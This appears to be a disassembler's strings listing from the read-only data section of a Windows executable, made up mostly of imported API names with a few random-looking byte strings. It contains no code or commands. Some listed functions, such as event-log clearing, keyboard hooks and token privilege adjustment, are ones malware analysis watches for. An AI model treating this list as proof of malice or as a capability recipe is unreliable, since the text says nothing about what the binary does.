.rdata:00413A23 0000000E C $x4GFZ\\%k*oTW5

.rdata:00413A35 00000008 C [>&{~~ 7

.rdata:00413A3E 00000006 C 7>|n\vO

.rdata:00413A45 00000007 C /zYjKK<

.rdata:00413A56 00000007 C $x\\XgBx

.rdata:00413A5E 00000006 C 3&.Hw

.rdata:00414462 00000016 C BuildTrusteeWithNameW

.rdata:0041447A 00000010 C GetTrusteeNameA

.rdata:0041448C 00000019 C BuildImpersonateTrusteeA

.rdata:004144A8 00000016 C GetNamedSecurityInfoW

.rdata:004144C0 00000019 C CryptGetDefaultProviderA

.rdata:004144DC 00000012 C CryptDuplicateKey

.rdata:004144F0 0000000F C RegSetValueExW

.rdata:00414502 00000016 C DeregisterEventSource

.rdata:0041451A 00000019 C BuildSecurityDescriptorA

.rdata:00414536 00000018 C InitiateSystemShutdownW

.rdata:00414550 00000018 C RegQueryMultipleValuesW

.rdata:0041456A 00000013 C LookupAccountNameW

.rdata:00414580 00000012 C RegSetKeySecurity

.rdata:00414594 0000000E C RegEnumValueW

.rdata:004145A4 00000019 C SetServiceObjectSecurity

.rdata:004145C0 00000015 C RegisterEventSourceA

.rdata:004145D8 00000017 C SetEntriesInAuditListW

.rdata:004145F2 00000015 C BuildTrusteeWithSidW

.rdata:0041460A 0000000C C RegLoadKeyW

.rdata:00414618 00000018 C GetOldestEventLogRecord

.rdata:00414632 00000012 C LookupAccountSidA

.rdata:00414646 00000010 C GetTrusteeTypeW

.rdata:00414658 00000015 C LookupPrivilegeNameA

.rdata:00414670 0000000E C CryptHashData

.rdata:00414680 0000001B C ImpersonateNamedPipeClient

.rdata:0041469E 00000016 C ObjectOpenAuditAlarmW

.rdata:004146B6 0000000E C RegEnumKeyExA

.rdata:004146C6 00000019 C BuildSecurityDescriptorW

.rdata:004146E2 00000016 C LookupPrivilegeValueA

.rdata:004146FA 0000000A C DeleteAce

.rdata:00414706 00000011 C OpenProcessToken

.rdata:0041471A 0000000E C DeleteService

.rdata:0041472A 0000000D C CryptDecrypt

.rdata:0041473A 00000015 C CreateProcessAsUserW

.rdata:00414752 0000000D C RevertToSelf

.rdata:00414762 0000001A C IsValidSecurityDescriptor

.rdata:0041477E 0000000F C RegReplaceKeyW

.rdata:00416AC4 00000009 C SetEvent

.rdata:00416AD0 00000018 C SetProcessPriorityBoost

.rdata:00416AEA 0000000E C IsBadWritePtr

.rdata:00416AFA 00000010 C TerminateThread

.rdata:00416B0C 00000013 C EnumResourceTypesW

.rdata:00416B22 00000016 C GetPrivateProfileIntW

.rdata:00416B3A 00000011 C OpenFileMappingA

.rdata:00415152 00000010 C GetMenuItemRect

.rdata:00415164 00000012 C LoadMenuIndirectW

.rdata:00415178 00000017 C EnumDisplaySettingsExW

.rdata:00415192 00000014 C BeginDeferWindowPos

.rdata:004151A8 0000000B C OemToCharW

.rdata:004151B6 00000010 C GetMonitorInfoW

.rdata:004151C8 0000000F C NotifyWinEvent

.rdata:004151DA 0000000C C GetKeyState

.rdata:004151E8 0000000B C RemoveMenu

.rdata:004151F6 00000010 C SetDlgItemTextW

.rdata:00415208 00000011 C GetDesktopWindow

.rdata:0041521C 0000000F C GetMessageTime

.rdata:0041522E 0000000E C GetClipCursor

.rdata:0041523E 0000000D C UpdateWindow

.rdata:0041524E 0000001B C GetPriorityClipboardFormat

.rdata:0041526C 0000000E C DrawFocusRect

.rdata:0041527C 0000000B C DragDetect

.rdata:0041528A 0000000E C GetUpdateRect

.rdata:0041529A 0000000A C GetCursor

.rdata:004152A6 0000000F C SetLastErrorEx

.rdata:004152B8 0000000C C LoadBitmapA

.rdata:004152C6 0000000B C CharLowerA

.rdata:004152D4 00000013 C SetMenuDefaultItem

.rdata:004152EA 00000017 C DdeCreateStringHandleW

.rdata:00415304 00000013 C GetDialogBaseUnits

.rdata:0041531A 0000000D C WindowFromDC

.rdata:0041532A 0000000E C GetAltTabInfo

.rdata:0041533A 0000000D C GetMenuState

.rdata:0041534A 00000015 C DdeClientTransaction

.rdata:00415362 0000000C C FindWindowW

.rdata:00415370 00000010 C CreateWindowExA

.rdata:00415382 00000015 C EnumDisplaySettingsA

.rdata:0041539A 0000000F C DdeInitializeA

.rdata:004153AC 0000000D C EnumPropsExW

.rdata:004153BC 0000000F C OemToCharBuffW

.rdata:004153CE 00000012 C SetWindowsHookExW

.rdata:004153E2 00000014 C UnhookWindowsHookEx

.rdata:004153F8 00000011 C SetMenuItemInfoA

.rdata:0041540C 00000009 C WinHelpW

.rdata:00415418 00000012 C GetKeyboardLayout

.rdata:0041542C 00000013 C SetClipboardViewer

.rdata:00415442 00000014 C GetNextDlgGroupItem

.rdata:00415458 00000015 C ChildWindowFromPoint

.rdata:00415470 00000009 C EndPaint

.rdata:0041547C 00000008 C EndMenu

.rdata:00415486 0000000C C ValidateRgn

.rdata:00415494 00000010 C GetKeyNameTextA

.rdata:004154A6 0000000D C SetWindowPos

.rdata:004154B6 00000017 C RegisterWindowMessageW

.rdata:004154D0 0000000A C UnionRect

.rdata:004154DC 00000012 C SetCaretBlinkTime

.rdata:004154F0 00000018 C DestroyAcceleratorTable

.rdata:0041550A 00000017 C ChangeDisplaySettingsW

.rdata:00415524 0000000B C LoadImageA

.rdata:00415532 00000013 C SetMenuItemBitmaps

.rdata:00415548 00000010 C DdeUnaccessData

.rdata:0041555A 0000000F C DefWindowProcW

.rdata:0041556C 00000017 C CreateIconFromResource

.rdata:00415586 0000000C C EditWndProc

.rdata:00415594 0000000C C ChangeMenuW

.rdata:00414790 00000015 C CryptAcquireContextW

.rdata:004147A8 00000012 C LookupAccountSidW

.rdata:004147BC 00000018 C SetEntriesInAccessListW

.rdata:004147D6 00000010 C RegDeleteValueA

.rdata:004147E8 00000011 C RegQueryValueExA

.rdata:004147FC 0000001A C GetSidIdentifierAuthority

.rdata:00414818 00000012 C CryptGetHashParam

.rdata:0041482C 0000001D C PrivilegedServiceAuditAlarmA

.rdata:0041484C 00000028 C BuildImpersonateExplicitAccessWithNameA

.rdata:00414876 0000000D C GetLengthSid

.rdata:00414886 0000000F C CryptImportKey

.rdata:00414898 00000019 C AllocateAndInitializeSid

.rdata:004148B4 00000028 C BuildImpersonateExplicitAccessWithNameW

.rdata:004148DE 0000000F C CryptSignHashW

.rdata:004148F0 00000017 C GetServiceDisplayNameA

.rdata:0041490A 00000017 C EnumDependentServicesA

.rdata:00414924 00000014 C CryptReleaseContext

.rdata:0041493A 0000001B C GetExplicitEntriesFromAclW

.rdata:00414958 0000000D C GetUserNameW

.rdata:00414968 00000014 C CryptEnumProvidersW

.rdata:0041497E 00000011 C FindFirstFreeAce

.rdata:00414992 00000013 C CloseServiceHandle

.rdata:004149A8 00000015 C GetCurrentHwProfileW

.rdata:004149C0 00000017 C CancelOverlappedAccess

.rdata:004149DA 0000000E C StartServiceA

.rdata:004149EA 0000000C C RegCloseKey

.rdata:004149F8 0000000F C RegQueryValueA

.rdata:00414A0A 00000016 C CryptVerifySignatureW

.rdata:00414A22 00000016 C AdjustTokenPrivileges

.rdata:00414A3A 00000013 C QueryServiceStatus

.rdata:00414A50 00000014 C RegConnectRegistryA

.rdata:00414A66 00000014 C GetTokenInformation

.rdata:00414A7C 0000001F C GetAccessPermissionsForObjectW

.rdata:00414A9E 0000000F C RegQueryValueW

.rdata:00414AB0 0000001A C AccessCheckAndAuditAlarmW

.rdata:00414ACC 0000001A C SetSecurityDescriptorSacl

.rdata:00414AE8 00000016 C AreAnyAccessesGranted

.rdata:00414B00 00000017 C ObjectCloseAuditAlarmA

.rdata:00414B1A 00000014 C QueryServiceConfigA

.rdata:00414B30 0000000F C ClearEventLogW

.rdata:00414B42 0000000E C RegUnLoadKeyA

.rdata:00414B52 00000015 C LookupPrivilegeNameW

.rdata:00414B6A 00000010 C GetSecurityInfo

.rdata:00414B7C 0000000E C RegEnumKeyExW

.rdata:00414B8C 0000001B C ObjectPrivilegeAuditAlarmW

.rdata:00414BAA 00000010 C GetTrusteeTypeA

.rdata:00414BBC 0000000E C RegOpenKeyExW

.rdata:00414BCC 0000000E C RegCreateKeyA

.rdata:00414BDC 0000000E C IsTextUnicode

.rdata:00414BEC 0000000E C OpenEventLogW

.rdata:00414BFC 00000018 C CryptEnumProviderTypesW

.rdata:00414C16 0000000F C RegRestoreKeyW

.rdata:00414C28 00000012 C CryptGetProvParam

.rdata:00414C3C 00000015 C ChangeServiceConfigA

.rdata:00414C54 0000000C C RegSaveKeyA

.rdata:00414C62 0000001D C BuildExplicitAccessWithNameW

.rdata:00414C82 0000001A C GetSecurityDescriptorSacl

.rdata:00414C9E 0000000C C RegLoadKeyA

.rdata:00414CAC 00000014 C GetMultipleTrusteeA

.rdata:00414CC2 00000014 C AddAccessAllowedAce

.rdata:00414CD8 00000012 C SetAclInformation

.rdata:00414CEC 0000000F C ControlService

.rdata:00414CFE 00000013 C GetSecurityInfoExW

.rdata:00414D14 0000000F C RegRestoreKeyA

.rdata:00414D26 00000016 C ObjectOpenAuditAlarmA

.rdata:00414D3E 00000008 C CopySid

.rdata:00414D48 0000000F C OpenSCManagerA

.rdata:00414D5A 00000018 C RegQueryMultipleValuesA

.rdata:00414D74 00000010 C OpenThreadToken

.rdata:00414D86 0000000B C LogonUserW

.rdata:004155A2 00000009 C DrawEdge

.rdata:004155AE 0000000B C GetDlgItem

.rdata:004155BC 00000016 C InternalGetWindowText

.rdata:004155D4 00000017 C ChangeDisplaySettingsA

.rdata:004155EE 0000000C C InsertMenuW

.rdata:004155FC 0000000C C SetMenuInfo

.rdata:0041560A 00000011 C DdeSetUserHandle

.rdata:0041561E 0000000C C GetMessageW

.rdata:0041562C 0000000C C ModifyMenuW

.rdata:0041563A 0000001C C MsgWaitForMultipleObjectsEx

.rdata:00415658 00000012 C DrawAnimatedRects

.rdata:0041566C 00000016 C GetUserObjectSecurity

.rdata:00415684 0000001B C GetMenuCheckMarkDimensions

.rdata:004156A2 00000008 C GetMenu

.rdata:004156AC 0000000E C DestroyCursor

.rdata:004156BC 00000013 C IsDlgButtonChecked

.rdata:004156D2 00000012 C GetCaretBlinkTime

.rdata:004156E6 0000000F C GetShellWindow

.rdata:004156F8 00000012 C GetClipboardOwner

.rdata:0041570C 00000010 C CallWindowProcA

.rdata:0041571E 00000013 C GetWindowPlacement

.rdata:00415734 0000000F C TabbedTextOutA

.rdata:00415746 00000014 C LoadKeyboardLayoutW

.rdata:0041575C 00000009 C IsZoomed

.rdata:00415768 00000018 C CreateAcceleratorTableW

.rdata:00415782 00000009 C FillRect

.rdata:0041578E 00000013 C RealGetWindowClass

.rdata:004157A4 0000000C C ToUnicodeEx

.rdata:004157B2 00000013 C OpenWindowStationW

.rdata:004157C8 0000000D C IsCharUpperA

.rdata:004157D8 0000000F C InvalidateRect

.rdata:004157EA 0000000F C GetMenuStringW

.rdata:004157FC 00000011 C IsDialogMessageW

.rdata:00415810 0000000F C ReleaseCapture

.rdata:00415822 0000000E C GetSystemMenu

.rdata:00415832 0000000B C SetCapture

.rdata:00415840 0000000C C GrayStringA

.rdata:0041584E 0000000E C SwitchDesktop

.rdata:0041585E 00000008 C SetRect

.rdata:00415868 0000000D C GetUpdateRgn

.rdata:00415878 0000000E C GetDlgItemInt

.rdata:00415888 0000000A C LoadMenuA

.rdata:00415892 0000000B C USER32.dll

.rdata:004158A0 00000011 C CoCreateInstance

.rdata:004158B4 00000018 C CoRegisterMessageFilter

.rdata:004158CE 0000000E C OleCreateLink

.rdata:004158DE 0000000C C OleCreateEx

.rdata:004158EC 00000008 C OleLoad

.rdata:004158F6 0000000E C GetConvertStg

.rdata:00415906 00000015 C CoQueryReleaseObject

.rdata:0041591E 00000017 C CreateDataAdviseHolder

.rdata:00415938 0000001F C CoGetInterfaceAndReleaseStream

.rdata:0041595A 0000000E C WriteClassStm

.rdata:0041596A 0000001B C StgGetIFillLockBytesOnFile

.rdata:00415988 00000010 C OleBuildVersion

.rdata:0041599A 00000014 C OleRegEnumFormatEtc

.rdata:004159B0 00000016 C GetRunningObjectTable

.rdata:004159C8 00000010 C UtGetDvtd32Info

.rdata:004159DA 00000018 C OleCreateStaticFromData

.rdata:004159F4 00000012 C OleCreateFromFile

.rdata:00415A08 00000011 C OleDoAutoConvert

.rdata:00415A1C 00000013 C OpenOrCreateStream

.rdata:00415A32 00000015 C OleNoteObjectVisible

.rdata:00415A4A 00000012 C CreateAntiMoniker

.rdata:00415A5E 00000020 C OleMetafilePictFromIconAndLabel

.rdata:00415A80 00000015 C CoUnmarshalInterface

.rdata:00415A98 00000019 C OleCreateEmbeddingHelper

.rdata:00415AB4 00000016 C CoRegisterClassObject

.rdata:00415ACC 00000015 C FreePropVariantArray

.rdata:00415AE4 00000012 C OleSetAutoConvert

.rdata:00414D94 00000011 C CryptDestroyHash

.rdata:00414DA8 00000015 C AbortSystemShutdownW

.rdata:00414DC0 00000012 C GetAclInformation

.rdata:00414DD4 0000000F C CreateServiceW

.rdata:00414DE6 0000000C C CryptGenKey

.rdata:00414DF4 0000001F C LookupSecurityDescriptorPartsW

.rdata:00414E16 00000023 C ConvertAccessToSecurityDescriptorA

.rdata:00414E3C 00000018 C SetEntriesInAccessListA

.rdata:00414E56 00000015 C AbortSystemShutdownA

.rdata:00414E6E 00000011 C SetEntriesInAclW

.rdata:00414E82 00000011 C GetFileSecurityA

.rdata:00414E96 0000000E C OpenEventLogA

.rdata:00414EA6 00000012 C CryptSetHashParam

.rdata:00414EBA 00000014 C CryptSetProviderExA

.rdata:00414ED0 00000014 C QueryServiceConfigW

.rdata:00414EE6 00000014 C CryptSetProviderExW

.rdata:00414EFC 00000014 C OpenBackupEventLogW

.rdata:00414F10 0000000D C ADVAPI32.dll

.rdata:00414F20 00000014 C SendMessageTimeoutW

.rdata:00414F36 00000011 C TileChildWindows

.rdata:00414F4A 00000008 C EndTask

.rdata:00414F54 00000011 C IsDialogMessageA

.rdata:00414F68 00000013 C DdeQueryNextServer

.rdata:00414F7E 0000000E C FlashWindowEx

.rdata:00414F8E 00000017 C GetKeyboardLayoutNameA

.rdata:00414FA8 00000012 C DdeFreeDataHandle

.rdata:00414FBC 00000011 C SetThreadDesktop

.rdata:00414FD0 0000000E C GetInputState

.rdata:00414FE0 00000011 C SetKeyboardState

.rdata:00414FF4 00000011 C SetMenuItemInfoW

.rdata:00415008 0000000E C GetMenuItemID

.rdata:00415018 0000000C C GrayStringW

.rdata:00415026 0000000F C EmptyClipboard

.rdata:00415038 00000010 C CreatePopupMenu

.rdata:0041504A 0000000C C LoadStringW

.rdata:00415058 0000000F C CallMsgFilterA

.rdata:0041506A 00000010 C GetActiveWindow

.rdata:0041507C 0000000F C RegisterHotKey

.rdata:0041508E 00000010 C DialogBoxParamA

.rdata:004150A0 00000011 C ExcludeUpdateRgn

.rdata:004150B4 0000000C C GetAncestor

.rdata:004150C2 0000000C C GetSysColor

.rdata:004150D0 0000000D C GetDlgCtrlID

.rdata:004150E0 00000014 C DdeFreeStringHandle

.rdata:004150F6 0000000C C LoadStringA

.rdata:00415104 00000012 C MonitorFromWindow

.rdata:00415118 00000011 C SetDeskWallpaper

.rdata:0041512C 0000000A C DrawFrame

.rdata:00415138 00000017 C RegisterWindowMessageA

.rdata:00415B96 0000001C C CoGetCurrentLogicalThreadId

.rdata:00415BB4 00000012 C CreateItemMoniker

.rdata:00415BC8 0000000C C CoGetMalloc

.rdata:00415BD6 0000000E C WriteClassStg

.rdata:00415BE6 00000011 C ReadStringStream

.rdata:00415BFA 00000017 C CreateGenericComposite

.rdata:00415C14 00000010 C PropVariantCopy

.rdata:00415C26 00000011 C StgOpenStorageEx

.rdata:00415C3A 00000008 C OleSave

.rdata:00415C44 0000000E C IsAccelerator

.rdata:00415C54 0000000C C BindMoniker

.rdata:00415C62 00000011 C CoGetCallContext

.rdata:00415C76 00000016 C CoFreeUnusedLibraries

.rdata:00415C8E 0000000F C StgOpenStorage

.rdata:00415CA0 00000013 C UpdateDCOMSettings

.rdata:00415CB6 00000014 C CoGetMarshalSizeMax

.rdata:00415CCC 00000011 C OleGetIconOfFile

.rdata:00415CE0 0000001B C StgOpenStorageOnILockBytes

.rdata:00415CFE 00000014 C CoQueryProxyBlanket

.rdata:00415D14 00000018 C UtConvertDvtd16toDvtd32

.rdata:00415D2E 0000001E C CoQueryAuthenticationServices

.rdata:00415AF8 00000018 C OleTranslateAccelerator

.rdata:00415B12 00000010 C OleSaveToStream

.rdata:00415B24 00000012 C CoGetTreatAsClass

.rdata:00415B38 0000000F C CoRevertToSelf

.rdata:00415B4A 0000000F C CoInitializeEx

.rdata:00415B5C 00000016 C OleIsCurrentClipboard

.rdata:00415B74 00000020 C OleConvertIStorageToOLESTREAMEx

.rdata:00416156 0000000A C StrToIntW

.rdata:00416162 00000010 C PathIsSameRootW

.rdata:00416174 00000015 C SHRegQueryInfoUSKeyW

.rdata:0041618C 00000011 C SHRegGetUSValueA

.rdata:004161A0 00000012 C SHDeleteEmptyKeyW

.rdata:004161B4 00000008 C StrCatW

.rdata:004161BE 0000000B C PathIsUNCW

.rdata:004161CC 0000000E C ColorHLSToRGB

.rdata:004161DC 0000000F C PathStripPathW

.rdata:004161EE 00000009 C HashData

.rdata:004161FA 00000008 C StrChrW

.rdata:00416204 00000010 C SHRegCloseUSKey

.rdata:00416216 00000008 C StrDupA

.rdata:00416220 0000000C C UrlGetPartW

.rdata:0041622E 0000000D C SHEnumValueA

.rdata:0041623E 0000000C C SHSetValueA

.rdata:0041624C 00000016 C PathMakeSystemFolderW

.rdata:00416264 0000000F C SHSkipJunction

.rdata:00416276 00000015 C PathFindSuffixArrayW

.rdata:0041628E 0000000B C PathIsURLA

.rdata:0041629C 00000014 C PathGetDriveNumberA

.rdata:004162B2 0000000B C SHCopyKeyA

.rdata:004162C0 00000015 C PathRenameExtensionA

.rdata:004162D8 00000009 C StrNCatA

.rdata:004162E4 00000010 C PathFileExistsA

.rdata:004162F6 00000009 C StrPBrkA

.rdata:00416302 0000000D C PathCombineA

.rdata:00416312 00000011 C PathCompactPathW

.rdata:00416326 00000010 C PathRemoveArgsA

.rdata:00416338 00000015 C SHRegQueryInfoUSKeyA

.rdata:00416350 0000000C C StrToIntExA

.rdata:0041635E 00000008 C StrStrW

.rdata:00416368 00000015 C PathFindSuffixArrayA

.rdata:00416380 0000000A C SHStrDupW

.rdata:0041638C 0000000A C StrRChrIW

.rdata:00416398 00000012 C PathCanonicalizeA

.rdata:004163AC 0000000D C StrRetToBufA

.rdata:004163BC 00000009 C StrCmpIW

.rdata:004163C8 00000011 C SHRegSetUSValueA

.rdata:004163DC 00000010 C SHRegOpenUSKeyW

.rdata:004163EE 00000013 C SHRegWriteUSValueA

.rdata:00416404 0000000D C StrRetToStrA

.rdata:00416414 00000009 C UrlHashA

.rdata:00416420 00000013 C PathFindExtensionA

.rdata:00416436 00000011 C SHRegGetUSValueW

.rdata:0041644A 0000000C C UrlGetPartA

.rdata:00416458 0000000A C StrToIntA

.rdata:00416464 00000009 C StrCSpnW

.rdata:00416470 00000016 C PathMakeSystemFolderA

.rdata:00416488 00000010 C PathFileExistsW

.rdata:0041649A 00000011 C PathGetCharTypeA

.rdata:004164AE 0000000A C StrRStrIW

.rdata:004164BA 0000000C C UrlCombineW

.rdata:004164C8 00000012 C SHRegCreateUSKeyW

.rdata:004164DC 00000011 C PathGetCharTypeW

.rdata:004164F0 00000014 C PathSetDlgItemPathW

.rdata:00416506 00000011 C UrlCanonicalizeA

.rdata:0041651A 00000010 C PathIsFileSpecW

.rdata:0041652C 00000014 C PathIsSystemFolderA

.rdata:00416542 0000000F C PathBuildRootW

.rdata:00416554 00000017 C SHRegDeleteEmptyUSKeyA

.rdata:0041656E 00000009 C ChrCmpIW

.rdata:0041657A 00000015 C SHRegGetBoolUSValueA

.rdata:00415D4E 00000010 C OleSetClipboard

.rdata:00415D60 0000000B C DoDragDrop

.rdata:00415D6E 0000000C C IsEqualGUID

.rdata:00415D7C 00000015 C CoReleaseMarshalData

.rdata:00415D94 0000000A C OleCreate

.rdata:00415DA0 00000015 C CoQueryClientBlanket

.rdata:00415DB8 0000000D C ReadClassStm

.rdata:00415DC8 00000011 C ReleaseStgMedium

.rdata:00415DDC 00000012 C CreateFileMoniker

.rdata:00415DF0 00000015 C OleSetMenuDescriptor

.rdata:00415E08 00000015 C CreatePointerMoniker

.rdata:00415E20 0000000F C CoTreatAsClass

.rdata:00415E32 00000013 C CoFreeAllLibraries

.rdata:00415E48 00000021 C StgGetIFillLockBytesOnILockBytes

.rdata:00415E6C 0000001A C CreateILockBytesOnHGlobal

.rdata:00415E88 00000014 C CreateObjrefMoniker

.rdata:00415E9E 0000000E C CreateBindCtx

.rdata:00415EAE 0000000E C StringFromIID

.rdata:00415EBE 00000015 C CoInitializeSecurity

.rdata:00415ED6 0000000F C CoBuildVersion

.rdata:00415EE8 00000012 C WriteStringStream

.rdata:00415EFC 0000001E C CoCreateFreeThreadedMarshaler

.rdata:00415F1C 00000011 C RegisterDragDrop

.rdata:00415F30 00000014 C OleCreateLinkToFile

.rdata:00415F46 00000013 C StgCreateStorageEx

.rdata:00415F5C 0000000D C CoGetPSClsid

.rdata:00415F6C 00000010 C OleCreateLinkEx

.rdata:00415F7E 00000012 C OleRegGetUserType

.rdata:00415F92 00000018 C OleCreateLinkFromDataEx

.rdata:00415FAC 00000016 C CoRegisterChannelHook

.rdata:00415FC4 00000014 C OleRegGetMiscStatus

.rdata:00415FDA 00000016 C CreateOleAdviseHolder

.rdata:00415FF2 00000014 C CoRegisterSurrogate

.rdata:00416008 00000014 C OleCreateFromDataEx

.rdata:0041601E 00000018 C CoDosDateTimeToFileTime

.rdata:00416038 00000011 C PropVariantClear

.rdata:0041604C 0000000D C ReadClassStg

.rdata:0041605C 00000024 C StgOpenAsyncDocfileOnIFillLockBytes

.rdata:00416082 00000018 C OleCreateDefaultHandler

.rdata:0041609C 00000018 C OleCreateMenuDescriptor

.rdata:004160B4 0000000A C ole32.dll

.rdata:004160C0 00000012 C PathRemoveBlanksW

.rdata:004160D4 0000000C C UrlCompareA

.rdata:004160E2 00000010 C PathFindOnPathA

.rdata:004160F4 0000000F C SHAutoComplete

.rdata:00416106 00000010 C UrlGetLocationW

.rdata:00416118 00000010 C PathIsRelativeW

.rdata:0041612A 00000013 C SHRegWriteUSValueW

.rdata:00416140 00000013 C PathIsContentTypeW

.rdata:00416614 0000000D C SHEnumKeyExW

.rdata:00416624 00000011 C PathCompactPathA

.rdata:00416638 0000000E C PathSkipRootA

.rdata:00416648 00000018 C PathUnmakeSystemFolderW

.rdata:00416662 0000000C C StrToIntExW

.rdata:00416670 00000011 C PathQuoteSpacesA

.rdata:00416684 00000016 C PathSearchAndQualifyA

.rdata:0041669C 00000010 C SHQueryValueExW

.rdata:004166AE 00000010 C PathRemoveArgsW

.rdata:004166C0 00000017 C PathFindNextComponentW

.rdata:004166DA 0000000B C PathIsUNCA

.rdata:004166E8 00000013 C PathIsContentTypeA

.rdata:004166FE 0000000D C StrRetToBufW

.rdata:0041670E 00000012 C PathFindFileNameW

.rdata:00416722 00000014 C SHRegDeleteUSValueA

.rdata:00416738 0000000F C SHDeleteValueW

.rdata:0041674A 0000000A C StrCSpnIA

.rdata:00416756 00000012 C PathCommonPrefixW

.rdata:0041676A 0000000E C PathIsPrefixW

.rdata:0041677A 00000010 C UrlIsNoHistoryW

.rdata:0041678C 0000000B C SHCopyKeyW

.rdata:00416592 00000012 C PathFindFileNameA

.rdata:004165A6 00000015 C SHIsLowMemoryMachine

.rdata:004165BE 0000000D C UrlUnescapeA

.rdata:004165CE 00000013 C SHRegDuplicateHKey

.rdata:004165E4 0000000D C SHDeleteKeyW

.rdata:004165F4 00000009 C StrStrIW

.rdata:00416600 00000011 C UrlCanonicalizeW

.rdata:00416B4E 0000000A C CopyFileA

.rdata:00416B5A 00000009 C lstrcpyn

.rdata:00416B66 0000000D C ReadConsoleW

.rdata:00416B76 0000000E C PeekNamedPipe

.rdata:00416B86 00000011 C CreateNamedPipeW

.rdata:00416B9A 00000013 C CreateDirectoryExA

.rdata:00416BB0 00000010 C SetThreadLocale

.rdata:00416BC2 0000000F C ClearCommBreak

.rdata:00416BD4 0000000D C SetStdHandle

.rdata:00416BE4 0000001F C GetNumberOfConsoleMouseButtons

.rdata:00416C06 00000015 C GetFileAttributesExW

.rdata:00416C1E 00000014 C WriteConsoleOutputW

.rdata:00416C34 00000010 C FlushViewOfFile

.rdata:00416C46 0000000B C PulseEvent

.rdata:00416C54 0000000D C GetLocalTime

.rdata:00416C64 00000015 C GetWindowsDirectoryA

.rdata:00416C7C 0000000E C SetCommConfig

.rdata:00416C8C 00000013 C GetFileAttributesW

.rdata:00416CA2 00000011 C GetConsoleTitleA

.rdata:00416CB6 00000017 C SetProcessAffinityMask

.rdata:00416CD0 0000000E C GetSystemInfo

.rdata:00416CE0 00000016 C FlushInstructionCache

.rdata:00416CF8 0000000F C SwitchToThread

.rdata:00416D0A 00000014 C GetCurrentProcessId

.rdata:00416D20 00000016 C DosDateTimeToFileTime

.rdata:00416D38 00000013 C EscapeCommFunction

.rdata:00416D4E 0000000C C HeapDestroy

.rdata:00416D5C 00000015 C SetCurrentDirectoryA

.rdata:00416D74 0000001B C GetConsoleScreenBufferInfo

.rdata:00416D92 0000000F C FindFirstFileA

.rdata:00416DA4 00000011 C CreateNamedPipeA

.rdata:00416DB8 00000010 C GetThreadLocale

.rdata:00416DCA 00000011 C GetTempFileNameA

.rdata:00416DDE 0000000D C GlobalUnWire

.rdata:00416DEE 0000000E C SwitchToFiber

.rdata:00416DFE 00000018 C LocalFileTimeToFileTime

.rdata:00416E18 00000014 C CreateTapePartition

.rdata:00416E2E 0000000F C GlobalAddAtomW

.rdata:00416E40 00000014 C WaitForSingleObject

.rdata:00416E56 0000000D C CreateMutexA

.rdata:00416E66 00000012 C GetShortPathNameW

.rdata:00416E7A 0000000C C FoldStringW

.rdata:00416E88 0000000F C CompareStringA

.rdata:00416E9A 00000009 C ReadFile

.rdata:00416EA6 00000019 C FreeLibraryAndExitThread

.rdata:00416EC2 00000010 C CompareFileTime

.rdata:00416ED4 00000019 C GetNamedPipeHandleStateA

.rdata:00416EF0 00000015 C GetUserDefaultLangID

.rdata:00416F08 00000016 C SetDefaultCommConfigA

.rdata:00416F20 00000011 C GetModuleHandleA

.rdata:00416F34 0000000E C GetSystemTime

.rdata:00416F44 00000016 C GetVolumeInformationW

.rdata:00416F5C 00000011 C GetLongPathNameA

.rdata:00416F70 0000000E C Process32Next

.rdata:00416F80 00000012 C SetFileApisToANSI

.rdata:00416F94 00000011 C FlushFileBuffers

.rdata:00416FA8 00000014 C GetSystemDirectoryW

.rdata:00416FBE 00000013 C GetCommModemStatus

.rdata:00416FD4 0000000B C GlobalSize

.rdata:00416FE2 00000013 C SetFileAttributesA

.rdata:00416FF8 00000012 C SetThreadPriority

.rdata:0041700C 00000009 C CancelIo

.rdata:00417018 00000012 C EnumCalendarInfoA

.rdata:0041679A 0000000D C SHDeleteKeyA

.rdata:004167AA 00000011 C SHRegSetUSValueW

.rdata:004167BE 00000014 C PathRelativePathToA

.rdata:004167D4 00000010 C PathMakePrettyW

.rdata:004167E6 0000000C C PathAppendA

.rdata:004167F4 00000010 C UrlIsNoHistoryA

.rdata:00416804 0000000C C SHLWAPI.dll

.rdata:00416812 00000014 C EnumCalendarInfoExA

.rdata:00416828 0000000D C Module32Next

.rdata:00416838 00000013 C EnumSystemLocalesW

.rdata:0041684E 0000000F C Heap32ListNext

.rdata:00416860 00000013 C GetUserDefaultLCID

.rdata:00416876 00000011 C EnumTimeFormatsA

.rdata:0041688A 0000000A C lstrcmpiA

.rdata:00416896 0000001A C GetQueuedCompletionStatus

.rdata:004168B2 0000000C C FreeLibrary

.rdata:004168C0 00000013 C EnumSystemLocalesA

.rdata:004168D6 0000000E C Thread32First

.rdata:004168E6 00000011 C GetNamedPipeInfo

.rdata:004168FA 0000000D C GlobalUnlock

.rdata:0041690A 00000018 C FreeEnvironmentStringsA

.rdata:00416924 0000000B C GlobalFree

.rdata:00416932 00000011 C GetCurrentThread

.rdata:00416946 00000012 C PeekConsoleInputA

.rdata:0041695A 00000010 C FindResourceExA

.rdata:0041696C 0000000F C VirtualProtect

.rdata:0041697E 0000000C C OpenProcess

.rdata:0041698C 00000017 C GetSystemDefaultLangID

.rdata:004169A6 00000017 C GetEnvironmentStringsA

.rdata:004169C0 0000000D C VirtualAlloc

.rdata:004169D0 00000009 C HeapLock

.rdata:004169DC 00000015 C ConvertDefaultLocale

.rdata:004169F4 00000010 C SetVolumeLabelW

.rdata:00416A06 0000000F C SizeofResource

.rdata:00416A18 00000011 C SetFileApisToOEM

.rdata:00416A2C 00000018 C FileTimeToLocalFileTime

.rdata:00416A46 00000011 C GetFullPathNameW

.rdata:00416A5A 00000012 C GetDiskFreeSpaceW

.rdata:00416A6E 0000000E C SetSystemTime

.rdata:00416A7E 00000013 C EnumDateFormatsExW

.rdata:00416A94 0000000F C CallNamedPipeA

.rdata:00416AA6 0000001C C FindCloseChangeNotification

.rdata:0041702C 00000008 C TlsFree

.rdata:00417036 00000018 C QueryPerformanceCounter

.rdata:00417050 00000015 C GetCurrentDirectoryW

.rdata:00417068 00000010 C WriteFileGather

.rdata:0041707A 00000011 C DefineDosDeviceW

.rdata:0041708E 00000016 C SetDefaultCommConfigW

.rdata:004170A6 00000014 C GetDevicePowerState

.rdata:004170BC 00000011 C SetPriorityClass

.rdata:004170D0 00000019 C GetPrivateProfileStringA

.rdata:004170EC 0000001E C GetNumberOfConsoleInputEvents

.rdata:0041710C 00000016 C ReadDirectoryChangesW

.rdata:00417124 00000013 C EndUpdateResourceA

.rdata:0041713A 00000011 C IsDBCSLeadByteEx

